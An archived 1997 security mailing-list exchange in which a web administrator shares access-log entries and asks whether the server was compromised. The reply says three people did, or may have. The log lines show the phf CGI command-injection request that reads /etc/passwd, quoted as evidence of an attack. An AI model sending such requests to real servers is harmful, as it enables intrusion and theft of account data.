[5127] in WWW Security List Archive
RE: What's this ?
daemon@ATHENA.MIT.EDU (Ben Camp)
Wed Apr 16 22:15:58 1997
From: Ben Camp <benc@gallerywatch.com>
To: "www-security@ns2.rutgers.edu" <www-security@ns2.rutgers.edu>,
"'Chung-Rui Kao'" <kaoc@hep3.phys.sinica.edu.tw>
Date: Wed, 16 Apr 1997 17:26:27 -0500
Errors-To: owner-www-security@ns2.rutgers.edu
No.. someone did not hack your site.. 3 people did... or may have..
----------
From: Chung-Rui Kao
Sent: Wednesday, April 16, 1997 5:55 AM
To: www-security@ns2.rutgers.edu
Subject: What's this ?
Dear Sir:
What does it mean ? if you find such messages in your access_log..
ps. my httpd is the NCSA version.
ip014.dialup.ntu.edu.tw - - [30/Jan/1997:18:50:58 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 644
ip010.dialup.ntu.edu.tw - - [01/Feb/1997:10:57:35 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 677
ogg081-025.resnet.wisc.edu - - [22/Feb/1997:01:21:32 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 681
192.192.98.116 - - [27/Mar/1997:19:17:43 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 759
Besides, I hope to know how can I prove whether there is someone who
tried to hack or had hacked my WWWW server?? My old httpd was the NCSA
HTTPd 1.3. As the document in the NCSA's offical site, it said there's
control codes in the access then there's someone attend to hack your server.
There's no any control code in my access_log file, but I doubt someone
hacked my server through the httpd daemon, and I hope someone can help me
to prove that.
Thank you.
4/16'97
